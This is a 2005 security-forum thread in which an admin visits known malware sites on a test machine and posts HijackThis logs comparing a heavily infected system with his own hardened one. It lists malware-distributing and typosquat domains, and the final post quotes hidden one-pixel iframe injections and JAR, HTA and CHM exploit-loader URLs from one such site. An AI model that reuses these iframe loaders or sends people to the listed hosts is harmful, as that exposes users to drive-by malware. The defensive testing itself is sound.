Where I have gone, what happened................

This forum is for testing I do with various security settings and tools. Infection infiltration, security lock down among other things. Currently XP Home-w\SP 2 installed

Moderators: Admin Team, Moderators

User avatar
TICTestBox
Site Admin
Site Admin
Posts: 245
Joined: Tue Apr 19, 2005 12:11 pm
Area Of Expertise: Infectcious Malware
experience: I know the functions, OS settings, registry tweaks and more
Location: TeMerc's House
Contact:

Where I have gone, what happened................

Postby TICTestBox » Mon May 02, 2005 11:51 pm

Ok, its been oer 2 weeks now since I started this experiment. So far, things are progressing as I had hoped.

I have gone to some sites which are known malware infestation sites, found by the likes of Webhelper.

These sites routinely run for 30 minutes loading up malwares, into the dozens of infections and hundreds of files. Below are a few of them.

***WARNING:DO NOT ATTEMPT TO GO TO THESE SITES UNLESS YOUR AN EXPERIENCED MALWARE FIGHTER AND FULLY PROTECTED TO BOOT***

008k.com : CWSI site
crackz.ws :New transponder site, providing the new Aurora infection.
600pics.com

From the recent Google mispelling scheme:
Googkle.com
Gooogle.com
XCNN.com

And a variety of other related mispellings of legit sites, which have been known to drop infections here and there.

And of course, every time I pick up a new site, which is not yet listed in eithr IESPYAD or MVPS hosts file, I go there too.

Thus far, the only thing thats happened was a minor attempted hijack and the Bube infection that wasn't.

So, at this point, I am very happy with whats transpired in this test and will continue for a while.

G3
Posts: 49
Joined: Fri Mar 11, 2005 10:42 pm
Contact:

Postby G3 » Fri May 06, 2005 2:21 pm

Thanks for the updates on your testing. It certainly proves we need defense and a lot of it. At your advice, as part of your tests, I also downloaded and installed the free version of Diamond's ProcessGuard. It adds one more layer of defense (prevents hackers from terminating my software). Thanks for the tip.

User avatar
JeanInMontana
Posts: 2570
Joined: Wed Feb 02, 2005 9:47 am
Gender: Female
experience: I know the functions, OS settings, registry tweaks and more
PC time: More than 4 hours a day
Location: South Central Montana USA
Contact:

Postby JeanInMontana » Sat May 07, 2005 7:35 am

I know I have gotten much more cautious in how I spell Google since your escapades. It is so easy to make a typo and not see it until it is too late. I think I am well protected, but I don't want to find out with a typo that I'm not!
Image Image

User avatar
TICTestBox
Site Admin
Site Admin
Posts: 245
Joined: Tue Apr 19, 2005 12:11 pm
Area Of Expertise: Infectcious Malware
experience: I know the functions, OS settings, registry tweaks and more
Location: TeMerc's House
Contact:

Postby TICTestBox » Mon May 09, 2005 12:10 pm

OK kids, went to a new site last nite.

Yet another porn site(SURPRISE). It was found by Webhelper and promptly DLed for 20 minutes all sorts of nasties. This is the log he got with HJT after hitting the site:



Code: Select all

Start at 700xxx.com/tgp.shtml
calls the following:
iframedollars.biz/dl/adv410.php
81.222.131.59/dl/adv410/x.chm
81.222.131.59/dl/adv410/sploit.anr
iframedollars.biz/dl/loadadv410.exe

HJT log
Logfile of HijackThis v1.99.1
Scan saved at 9:53:01 AM, on 5/8/2005
Platform: Windows XP (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\VMADD\VMSRVC.EXE
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccProxy.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\System32\VPCMap.exe
C:\WINDOWS\VMADD\VMUSrvc.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WinZip\WZQKPICK.EXE
C:\WINDOWS\System32\wuauclt.exe
C:\Program Files\Common Files\Symantec Shared\NMain.exe
C:\Program Files\Common Files\symantec shared\CCLGVIEW.EXE
C:\Program Files\Blighty Design\spade.exe
C:\WINDOWS\System32\cmd.exe
C:\WINDOWS\tool1.exe
C:\WINDOWS\System32\paytime.exe
C:\WINDOWS\stubinstaller5356.exe
C:\WINDOWS\shop1004.exe
c:\wp.exe
C:\WINDOWS\System32\Services\{B6B58591-DD53-4F2F-B968-B11F7D689929}\SVCHOST.EXE
C:\Program Files\Internet Optimizer\optimize.exe
C:\Program Files\Common Files\WinTools\WToolsA.exe
C:\Program Files\BullsEye Network\bin\bargains.exe
C:\Program Files\Common Files\WinTools\WSup.exe
C:\WINDOWS\System32\rsfmebuf.exe
C:\WINDOWS\System32\exdl1.exe
c:\windows\system32\mnklins.exe
c:\windows\system32\calc.exe
C:\WINDOWS\System32\senaint.exe
C:\Program Files\AutoUpdate\AutoUpdate.exe
C:\Program Files\Toolbar\TBPS.exe
C:\WINDOWS\System32\ap9h4qmo.exe
C:\PROGRA~1\Toolbar\PIB.exe
C:\DOCUME~1\pjordan\LOCALS~1\Temp\rs.exe
C:\Program Files\WebSiteViewer\124716.dlr
C:\program files\internet explorer\iexplore.exe
C:\PROGRA~1\Toolbar\TBPSSvc.exe
C:\Program Files\Common Files\WinTools\WToolsS.exe
C:\Documents and Settings\pjordan\Desktop\Utilities\HJT199_1\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://81.222.131.49/index.php
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.websearch.com/ie.aspx?tb_id=50162
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://81.222.131.49/index.php
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://81.222.131.49/index.php
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,SearchAssistant = http://www.websearch.com/ie.aspx?tb_id=50162
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,CustomizeSearch = res://C:\PROGRA~1\Toolbar\toolbar.dll/sa
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://81.222.131.49/index.php
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.websearch.com/ie.aspx?tb_id=50162
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = res://C:\PROGRA~1\Toolbar\toolbar.dll/sa
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = http://81.222.131.49/index.php
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = http://81.222.131.49/index.php
R3 - URLSearchHook: (no name) - _{CFBFAE00-17A6-11D0-99CB-00C04FD64497} - (no file)
O1 - Hosts: 127.0.0.3 n-glx.s-redirect.com
O1 - Hosts: 127.0.0.3 x.full-tgp.net
O1 - Hosts: 127.0.0.3 counter.sexmaniack.com
O1 - Hosts: 127.0.0.3 autoescrowpay.com
O1 - Hosts: 127.0.0.3 www.autoescrowpay.com
O1 - Hosts: 127.0.0.3 www.awmdabest.com
O1 - Hosts: 127.0.0.3 www.sexfiles.nu
O1 - Hosts: 127.0.0.3 awmdabest.com
O1 - Hosts: 127.0.0.3 sexfiles.nu
O1 - Hosts: 127.0.0.3 allforadult.com
O1 - Hosts: 127.0.0.3 www.allforadult.com
O1 - Hosts: 127.0.0.3 www.iframe.biz
O1 - Hosts: 127.0.0.3 iframe.biz
O1 - Hosts: 127.0.0.3 www.newiframe.biz
O1 - Hosts: 127.0.0.3 newiframe.biz
O1 - Hosts: 127.0.0.3 www.vesbiz.biz
O1 - Hosts: 127.0.0.3 vesbiz.biz
O1 - Hosts: 127.0.0.3 www.pizdato.biz
O1 - Hosts: 127.0.0.3 pizdato.biz
O1 - Hosts: 127.0.0.3 www.aaasexypics.com
O1 - Hosts: 127.0.0.3 aaasexypics.com
O1 - Hosts: 127.0.0.3 www.virgin-tgp.net
O1 - Hosts: 127.0.0.3 virgin-tgp.net
O1 - Hosts: 127.0.0.3 www.awmcash.biz
O1 - Hosts: 127.0.0.3 awmcash.biz
O1 - Hosts: 127.0.0.3 buldog-stats.com
O1 - Hosts: 127.0.0.3 www.buldog-stats.com
O1 - Hosts: 127.0.0.3 fregat.drocherway.com
O1 - Hosts: 127.0.0.3 slutmania.biz
O1 - Hosts: 127.0.0.3 www.slutmania.biz
O1 - Hosts: 127.0.0.3 toolbarpartner.com
O1 - Hosts: 127.0.0.3 www.toolbarpartner.com
O1 - Hosts: 127.0.0.3 www.megapornix.com
O1 - Hosts: 127.0.0.3 megapornix.com
O1 - Hosts: 127.0.0.3 www.sp2fucked.biz
O1 - Hosts: 127.0.0.3 sp2fucked.biz
O1 - Hosts: 127.0.0.3 greg-tut.com
O1 - Hosts: 127.0.0.3 www.greg-tut.com
O1 - Hosts: 127.0.0.3 nylonsexy.com
O1 - Hosts: 127.0.0.3 www.nylonsexy.com
O1 - Hosts: 127.0.0.3 vparivalka.com
O1 - Hosts: 127.0.0.3 www.vparivalka.com
O1 - Hosts: 127.0.0.3 iframeprofit.com
O1 - Hosts: 127.0.0.3 www.iframeprofit.com
O1 - Hosts: 127.0.0.3 topsearch10.com
O1 - Hosts: 127.0.0.3 www.topsearch10.com
O1 - Hosts: 127.0.0.3 statscash.biz
O1 - Hosts: 127.0.0.3 www.statscash.biz
O1 - Hosts: 127.0.0.3 vxiframe.biz
O1 - Hosts: 127.0.0.3 www.vxiframe.biz
O1 - Hosts: 127.0.0.3 crazy-toolbar.com
O1 - Hosts: 127.0.0.3 www.crazy-toolbar.com
O1 - Hosts: 127.0.0.3 topcash.biz
O1 - Hosts: 127.0.0.3 www.topcash.biz
O1 - Hosts: 127.0.0.3 loadcash.biz
O1 - Hosts: 127.0.0.3 www.loadcash.biz
O2 - BHO: BHObj Class - {00000010-6F7D-442C-93E3-4A4827C2E4C8} - C:\WINDOWS\nem220.dll
O2 - BHO: CeresObj Class - {00000049-8F91-4D9C-9573-F016E7626484} - C:\WINDOWS\ceres.dll
O2 - BHO: (no name) - {016235BE-59D4-4CEB-ADD5-E2378282A1D9} - C:\Program Files\CxtPls\cxtpls.dll
O2 - BHO: IE Update Class - {5B4AB8E2-6DC5-477A-B637-BF3C1A2E5993} - C:\WINDOWS\isrvs\sysupd.dll
O2 - BHO: (no name) - {87766247-311C-43B4-8499-3D5FEC94A183} - C:\PROGRA~1\COMMON~1\WinTools\WToolsB.dll
O2 - BHO: (no name) - {8952A998-1E7E-4716-B23D-3DBE03910972} - C:\PROGRA~1\Toolbar\toolbar.dll
O2 - BHO: Web assistant - {9ECB9560-04F9-4bbc-943D-298DDF1699E1} - C:\Program Files\Common Files\Symantec Shared\AdBlocking\NISShExt.dll
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton Internet Security\Norton AntiVirus\NavShExt.dll
O2 - BHO: ADP UrlCatcher Class - {F4E04583-354E-4076-BE7D-ED6A80FD66DA} - C:\WINDOWS\System32\msbe.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Web assistant - {0B53EAC3-8D69-4b9e-9B19-A37C9A5676A7} - C:\Program Files\Common Files\Symantec Shared\AdBlocking\NISShExt.dll
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton Internet Security\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: UCmore XP - The Search Accelerator - {44BE0690-5429-47f0-85BB-3FFD8020233E} - C:\Program Files\TheSearchAccelerator\UCMTSAIE.dll
O3 - Toolbar: &Search Toolbar - {339BB23F-A864-48C0-A59F-29EA915965EC} - C:\PROGRA~1\Toolbar\toolbar.dll
O4 - HKLM\..\Run: [VPCUserServices] C:\WINDOWS\VMADD\VMUSrvc.exe
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [IS CfgWiz] C:\Program Files\Common Files\Symantec Shared\cfgwiz.exe /GUID NIS /CMDLINE "REBOOT"
O4 - HKLM\..\Run: [Symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe
O4 - HKLM\..\Run: [SSC_UserPrompt] C:\Program Files\Common Files\Symantec Shared\Security Center\UsrPrmpt.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_06\bin\jusched.exe
O4 - HKLM\..\Run: [sunasDTServ] C:\Program Files\Sunbelt Software\CounterSpy Client\sunasDtServ.exe
O4 - HKLM\..\Run: [sunasServ] C:\Program Files\Sunbelt Software\CounterSpy Client\sunasServ.exe
O4 - HKLM\..\Run: [PayTime] C:\WINDOWS\System32\paytime.exe
O4 - HKLM\..\Run: [AutoLoaderAproposClient] "C:\WINDOWS\cxtpls_loader.exe" /HideUninstall /HideDir /PC=CP.AMS /ShowLegalNote=nonbranded
O4 - HKLM\..\Run: [Internet Optimizer] "C:\Program Files\Internet Optimizer\optimize.exe"
O4 - HKLM\..\Run: [Desktop Search] C:\WINDOWS\isrvs\desktop.exe
O4 - HKLM\..\Run: [Service Host] C:\WINDOWS\System32\Services\{B6B58591-DD53-4F2F-B968-B11F7D689929}\SVCHOST.EXE
O4 - HKLM\..\Run: [ffis] C:\WINDOWS\isrvs\ffisearch.exe
O4 - HKLM\..\Run: [BullsEye Network] C:\Program Files\BullsEye Network\bin\bargains.exe
O4 - HKLM\..\Run: [Disk Keeper] C:\WINDOWS\System32\Services\{B6B58591-DD53-4F2F-B968-B11F7D689929}\SECURITY.EXE
O4 - HKLM\..\Run: [WinTools] C:\PROGRA~1\COMMON~1\WinTools\WToolsA.exe
O4 - HKLM\..\Run: [mnklins] c:\windows\system32\mnklins.exe
O4 - HKLM\..\Run: [u33f3FX] senaint.exe
O4 - HKLM\..\Run: [ap9h4qmo] C:\WINDOWS\System32\ap9h4qmo.exe
O4 - HKLM\..\Run: [AutoUpdater] "C:\Program Files\AutoUpdate\AutoUpdate.exe"
O4 - HKLM\..\Run: [TBPS] C:\PROGRA~1\Toolbar\TBPS.exe
O4 - HKLM\..\Run: [Security iGuard] C:\Program Files\Security iGuard\Security iGuard.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [PayTime] C:\WINDOWS\System32\paytime.exe
O4 - HKCU\..\Run: [180ClientStubInstall] "C:\WINDOWS\stubinstaller5356.exe"
O4 - HKCU\..\Run: [f0spRPbnl] rsfmebuf.exe
O4 - HKCU\..\Run: [WindowsFY] c:\wp.exe
O4 - HKCU\..\Run: [Lous] C:\Documents and Settings\pjordan\Application Data\osse.exe
O4 - Global Startup: WinZip Quick Pick.lnk = C:\WinZip\WZQKPICK.EXE
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\j2re1.4.2_06\bin\npjpi142_06.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\j2re1.4.2_06\bin\npjpi142_06.dll
O9 - Extra button: Microsoft AntiSpyware helper - {8E5CA8C9-2AAE-4645-AD33-2311C47EE19F} - (no file) (HKCU)
O9 - Extra 'Tools' menuitem: Microsoft AntiSpyware helper - {8E5CA8C9-2AAE-4645-AD33-2311C47EE19F} - (no file) (HKCU)
O15 - Trusted Zone: *.blazefind.com
O15 - Trusted Zone: *.clickspring.net
O15 - Trusted Zone: *.flingstone.com
O15 - Trusted Zone: *.mt-download.com
O15 - Trusted Zone: *.my-internet.info
O15 - Trusted Zone: *.searchbarcash.com
O15 - Trusted Zone: *.searchmiracle.com
O15 - Trusted Zone: *.skoobidoo.com
O15 - Trusted Zone: *.slotch.com
O15 - Trusted Zone: *.slotchbar.com
O15 - Trusted Zone: *.windupdates.com
O15 - Trusted Zone: *.xxxtoolbar.com
O15 - Trusted Zone: *.ysbweb.com
O15 - Trusted Zone: *.blazefind.com (HKLM)
O15 - Trusted Zone: *.clickspring.net (HKLM)
O15 - Trusted Zone: *.flingstone.com (HKLM)
O15 - Trusted Zone: *.mt-download.com (HKLM)
O15 - Trusted Zone: *.my-internet.info (HKLM)
O15 - Trusted Zone: *.searchbarcash.com (HKLM)
O15 - Trusted Zone: *.searchmiracle.com (HKLM)
O15 - Trusted Zone: *.skoobidoo.com (HKLM)
O15 - Trusted Zone: *.slotch.com (HKLM)
O15 - Trusted Zone: *.slotchbar.com (HKLM)
O15 - Trusted Zone: *.windupdates.com (HKLM)
O15 - Trusted Zone: *.xxxtoolbar.com (HKLM)
O15 - Trusted Zone: *.ysbweb.com (HKLM)
O15 - Trusted IP range: 81.222.131.59
O15 - Trusted IP range: 81.222.131.59 (HKLM)
O16 - DPF: {9EB320CE-BE1D-4304-A081-4B4665414BEF} (MediaTicketsInstaller Control) - http://www.mt-download.com/MediaTicketsInstaller.cab?refid=2732
O17 - HKLM\System\CCS\Services\Tcpip\..\{432CB0FF-2031-4DE2-BF67-4DE45645CEB6}: NameServer = 68.56.0.5,68.56.0.6
O17 - HKLM\System\CS1\Services\Tcpip\..\{432CB0FF-2031-4DE2-BF67-4DE45645CEB6}: NameServer = 68.56.0.5,68.56.0.6
O17 - HKLM\System\CS2\Services\Tcpip\..\{432CB0FF-2031-4DE2-BF67-4DE45645CEB6}: NameServer = 68.56.0.5,68.56.0.6
O18 - Protocol: tpro - {FF76A5DA-6158-4439-99FF-EDC1B3FE100C} - C:\PROGRA~1\Toolbar\toolbar.dll
O18 - Filter: text/html - {950238FB-C706-4791-8674-4D429F85897E} - C:\WINDOWS\isrvs\mfiltis.dll
O20 - Winlogon Notify: drct16 - C:\WINDOWS\SYSTEM32\drct16.dll
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Network Proxy (ccProxy) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccProxy.exe
O23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
O23 - Service: Norton AntiVirus Auto Protect Service (navapsvc) - Symantec Corporation - C:\Program Files\Norton Internet Security\Norton AntiVirus\navapsvc.exe
O23 - Service: SAVScan - Symantec Corporation - C:\Program Files\Norton Internet Security\Norton AntiVirus\SAVScan.exe
O23 - Service: ScriptBlocking Service (SBService) - Symantec Corporation - C:\PROGRA~1\COMMON~1\SYMANT~1\SCRIPT~1\SBServ.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
O23 - Service: Symantec Core LC - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
O23 - Service: SymWMI Service (SymWSC) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe
O23 - Service: WebSeach Toolbar support NT service (TBPSSvc) - Unknown owner - C:\PROGRA~1\Toolbar\TBPSSvc.exe
O23 - Service: WinTools for IE service (WinToolsSvc) - Unknown owner - C:\Program Files\Common Files\WinTools\WToolsS.exe
O23 - Service: ZESOFT - Unknown owner - C:\WINDOWS\zeta.exe


You can see thats quite some mess!!! <<!

What did I get you ask? <?>

Well, I got several attempts at trojans wanting to DL, proabably about a dozen or so, which were all caught by Avast! scanner.

After running scans with AAW SE, Spybot and MS\AS, only 3 items were found:
tracking cookies :D

Thats right, that was it, tracking cookies. Those and about 2500 temp files, not unusual tho, that number. And I was clicking around for about 40 minutes.

Any MY HJT log?

Code: Select all

Logfile of HijackThis v1.99.1
Scan saved at 12:03:40 PM, on 5/9/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\AVPersonal\AVWUPSRV.EXE
C:\Program Files\ProcessGuard\dcsuserprot.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:\PROGRA~1\BILLPS~1\WINPAT~1\WinPatrol.exe
C:\Program Files\Microsoft AntiSpyware\gcasServ.exe
C:\Program Files\ProcessGuard\pgaccount.exe
C:\Program Files\AVPersonal\AVSched32.EXE
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\Program Files\AVPersonal\AVGNT.EXE
C:\Program Files\Microsoft AntiSpyware\gcasDtServ.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\PROGRA~1\PANICW~1\POP-UP~1\PSFree.exe
C:\Program Files\Gadwin Systems\PrintScreen\PrintScreen.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\ProcessGuard\procguard.exe
C:\Program Files\WinZip\WZQKPICK.EXE
C:\Program Files\SpywareGuard\sgmain.exe
C:\Program Files\Winwall\Winwall.exe
C:\Program Files\SpywareGuard\sgbhp.exe
C:\Program Files\Yahoo!\Messenger\YPager.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\AVPersonal\AVGUARD.EXE
C:\Program Files\Internet Explorer\iexplore.exe
C:\HJT1991\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://temerc.com/phpBB2/
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
O2 - BHO: SpywareGuard Download Protection - {4A368E80-174F-4872-96B5-0B27DDD11DB2} - C:\Program Files\SpywareGuard\dlprotect.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [WinPatrol] "C:\PROGRA~1\BILLPS~1\WINPAT~1\WinPatrol.exe"
O4 - HKLM\..\Run: [gcasServ] "C:\Program Files\Microsoft AntiSpyware\gcasServ.exe"
O4 - HKLM\..\Run: [!1_pgaccount] "C:\Program Files\ProcessGuard\pgaccount.exe"
O4 - HKLM\..\Run: [AVSCHED32] C:\Program Files\AVPersonal\AVSched32.EXE /min
O4 - HKLM\..\Run: [Zone Labs Client] C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
O4 - HKLM\..\Run: [AVGCtrl] C:\Program Files\AVPersonal\AVGNT.EXE /min
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [PopUpStopperFreeEdition] "C:\PROGRA~1\PANICW~1\POP-UP~1\PSFree.exe"
O4 - HKCU\..\Run: [Gadwin PrintScreen 2.6] C:\Program Files\Gadwin Systems\PrintScreen\PrintScreen.exe /nosplash
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [!1_ProcessGuard_Startup] "C:\Program Files\ProcessGuard\procguard.exe" -minimize
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\Program Files\Yahoo!\Messenger\ypager.exe" -quiet
O4 - Startup: SpywareGuard.lnk = C:\Program Files\SpywareGuard\sgmain.exe
O4 - Startup: Winwall Autostart.lnk = C:\Program Files\Winwall\Winwall.exe
O4 - Global Startup: WinZip Quick Pick.lnk = C:\Program Files\WinZip\WZQKPICK.EXE
O8 - Extra context menu item: &Google Search - res://c:\program files\google\GoogleToolbar2.dll/cmsearch.html
O8 - Extra context menu item: Backward Links - res://c:\program files\google\GoogleToolbar2.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://c:\program files\google\GoogleToolbar2.dll/cmcache.html
O8 - Extra context menu item: Similar Pages - res://c:\program files\google\GoogleToolbar2.dll/cmsimilar.html
O8 - Extra context menu item: Translate into English - res://c:\program files\google\GoogleToolbar2.dll/cmtrans.html
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O16 - DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} (PCPitstop Utility) - http://www.pcpitstop.com/pcpitstop/PCPitStop.CAB
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=34738&clcid=0x409
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://v5.windowsupdate.microsoft.com/v5consumer/V5Controls/en/x86/client/wuweb_site.cab?1111384862544
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - http://a840.g.akamai.net/7/840/537/2004061001/housecall.trendmicro.com/housecall/xscan53.cab
O16 - DPF: {77E32299-629F-43C6-AB77-6A1E6D7663F6} (Groove Control) - http://www.nick.com/common/groove/gx/GrooveAX27.cab
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoftware.com/activescan/as5/asinst.cab
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/MsnMessengerSetupDownloader.cab
O23 - Service: AntiVir Service (AntiVirService) - H+BEDV Datentechnik GmbH - C:\Program Files\AVPersonal\AVGUARD.EXE
O23 - Service: AntiVir Update (AVWUpSrv) - H+BEDV Datentechnik GmbH, Germany - C:\Program Files\AVPersonal\AVWUPSRV.EXE
O23 - Service: DiamondCS Process Guard Service v3.000 (DCSPGSRV) - DiamondCS - C:\Program Files\ProcessGuard\dcsuserprot.exe
O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINDOWS\system32\ZoneLabs\vsmon.exe


Thats quite some difference huh??

Take this !*!* spyware!

And this FU

Your not getting into my box!!!!


MUAHHAHAHAAHAHHAAAA

Until next time, when I'm [;] at the pc, searching for nasties.

Tom ><:

User avatar
clif_notes
Freeware Research Specialist
Freeware Research Specialist
Posts: 562
Joined: Wed Feb 02, 2005 12:13 am
Location: OHIO, USA
Contact:

Postby clif_notes » Thu Jun 09, 2005 6:29 pm

Hi Tom,

I noticed in your log that you use WinWall. Is it this program?
http://www.net-session.com/index.php?page=winwall

If so, would you like to provide a simple review of it?
Likes, dislikes, ease of use, etc.
Image
http://clifnotes.net
Devoted to promoting freeware and free information

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Postby TeMerc » Thu Jun 09, 2005 7:25 pm

clif_notes wrote:Hi Tom,

I noticed in your log that you use WinWall. Is it this program?
http://www.net-session.com/index.php?page=winwall

If so, would you like to provide a simple review of it?
Likes, dislikes, ease of use, etc.

Yup, thats it, and yes, I'll write something up about it, np.
Image

User avatar
JeanInMontana
Posts: 2570
Joined: Wed Feb 02, 2005 9:47 am
Gender: Female
experience: I know the functions, OS settings, registry tweaks and more
PC time: More than 4 hours a day
Location: South Central Montana USA
Contact:

Postby JeanInMontana » Thu Jun 09, 2005 8:38 pm

Skoobido??? hm?
Image Image

User avatar
TeMerc
Site Admin
Site Admin
Posts: 15995
Joined: Fri Jan 28, 2005 5:16 pm
Area Of Expertise: Security
experience: I know the functions, OS settings, registry tweaks and more
PC time: What else is there in life?
Location: PHX, AZ
Contact:

Postby TeMerc » Mon Jun 13, 2005 3:15 pm

OK, well this week brought me a new site to try and get infected with.

The site:
hxxp:crazy-toolbar.com

From Webhelepr:
Webhelper: crazy-toolbar.com Off limits

Head this warning as you can end up having your explorer.exe that is a major part of windows overwritten if you go to this site.

I just diabled the Internet and ran the soft.exe and it changes the explorer.exe version and size and you will get a message to use your CD to fix the overwrite.

Code: Select all


69.50.190.131/?to=nan38&from=in : exp2.girlspark.net
crazy-toolbar.com/home/liter/
<iframe src="http://crazy-toolbar.com/new2/web.php?account=liter" width="1" height="1">
crazy-toolbar.com/new2/hta.php?account=liter

  <iframe src="http://crazy-toolbar.com/new11/accliter/web.php?account=liter" width="1" height="1">
crazy-toolbar.com/new11/accliter/jar.php?account=liter" CODE="Counter.class

  <iframe src="http://crazy-toolbar.com/new12/web.php?account=liter" width="1" height="1">
crazy-toolbar.com/new12/classload.jar" CODE="GetAccess.class
crazy-toolbar.com/soft.php?login=liter&num=12

  <iframe src="http://crazy-toolbar.com/new4/accliter/web.php" width="1" height="1">
foo. mht!${PATH}/exploit. chm : :/exploit.htm
**
  <iframe src="http://crazy-toolbar.com/new13/accliter/web.php" width="1" height="1">
foo .mht!${PATH}/exploit .chm : :/exploit.htm

